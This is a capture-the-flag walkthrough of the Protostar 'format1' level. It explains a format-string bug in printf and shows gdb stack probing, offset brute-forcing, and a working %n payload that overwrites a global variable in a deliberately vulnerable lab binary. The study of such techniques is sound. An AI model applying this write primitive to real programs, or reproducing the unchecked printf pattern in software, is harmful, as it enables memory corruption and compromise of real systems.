This time, in Format 1 challenge of Protostar wargame, we are provided with the following source code of the vulnerable program.
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int target;
void vuln(char *string)
{
printf(string);
if(target) {
printf(“you have modified the target :)\n”);
}
}
int main(int argc, char **argv)
{
vuln(argv[1]);
}
First, we try to find at what parameter position we start reading our own input. We are told “your input string lies far up the stack :)”
user@protostar:/opt/protostar/bin$ gdb -q ./format1
Reading symbols from /opt/protostar/bin/format1…done.
(gdb) run “AAAA.%x.%x.%x.%x.%x.%x.%x.%x”
Starting program: /opt/protostar/bin/format1 “AAAA.%x.%x.%x.%x.%x.%x.%x.%x”
AAAA.804960c.bffff788.8048469.b7fd8304.b7fd7ff4.bffff788.8048435.bffff96f
Program exited normally.
(gdb) run “AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x”
Starting program: /opt/protostar/bin/format1 “AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x”
AAAA804960c.bffff608.8048469.b7fd8304.b7fd7ff4.bffff608.8048435.bffff7f0.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff688.b7eadc76.2.bffff6b4.bffff6c0.b7fe1848.bffff670.ffffffff.b7ffeff4.804824d.1.bffff670.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff688.9678b196.bc2ce786.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff6b4.8048450.8048440.b7ff1040.bffff6ac.b7fff8f8.2.bffff7d5.bffff7f0.0.bffff98c.bffff996.bffff9b7.bffff9cb.bffff9d3.bffff9ed.bffff9fd.bffffa10.bffffa1d.bffffa2c.bffffa38.bffffa43.bffffa81.bffffa92.bfffff82.bfffff90.bfffffa7.bfffffd8.0.20.b7fe2414.21.b7fe2000.10.78bf3bf.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.3e9.d.3e9.e.3e9.17.1.19.bffff7bb.1f.bfffffe1.f.bffff7cb.0.0.0.0.0.ca000000.483c508f.5274b4ca.6f4d36cc.69e05f8d.363836.0.706f2f00.72702f74.736f746f.2f726174.2f6e6962.6d726f66.317461.41414141
Program exited normally.
Instead of a huge number of “%x”, we can leverage the direct parameter access feature and use only format output.
We will brute-force the position of our parameter with a simple bash script.
user@protostar:/opt/protostar/bin$ for i in {1..200}; do echo -n “$i “;
./format1 “AAAABB%$i\$x” | grep 4141; if (( $? == 0 )); then break; fi ; echo
””; done;….
130 AAAABB41414141
We start reading our input at position 130.
user@protostar:/opt/protostar/bin$ ./format1 “AAAABB%130\$x”
AAAABB41414141
We can also tell our program to write at a provided address by using “%n”
user@protostar:/opt/protostar/bin$ ./format1 `python -c ‘print “AAAABB%130\$n”’`
Segmentation fault (core dumped)
user@protostar:/opt/protostar/bin$ gdb -q ./format1 /tmp/core.11.format1.12342
Reading symbols from /opt/protostar/bin/format1…done.
Now, time to overwrite our target. As the variable is an unitialized global, it
will be stored in .bss section. We use -t option of objdump to output the
symbol table.
user@protostar:/opt/protostar/bin$ objdump -t ./format1 | grep target
08049638 g O .bss 00000004 target
With all the necessary information in our hands, crafting the exploit is easy.
user@protostar:/opt/protostar/bin$ ./format1 `python -c ‘print “\x38\x96\x04\x08BB%130\$n”’`
8�BByou have modified the target :)
One last point, in this challenge, the condition is “if (target)” as global
unitialized variables are set to 0. What the “%n” parameter writes in target
variable isn’t that much important. It is left for the next challenge.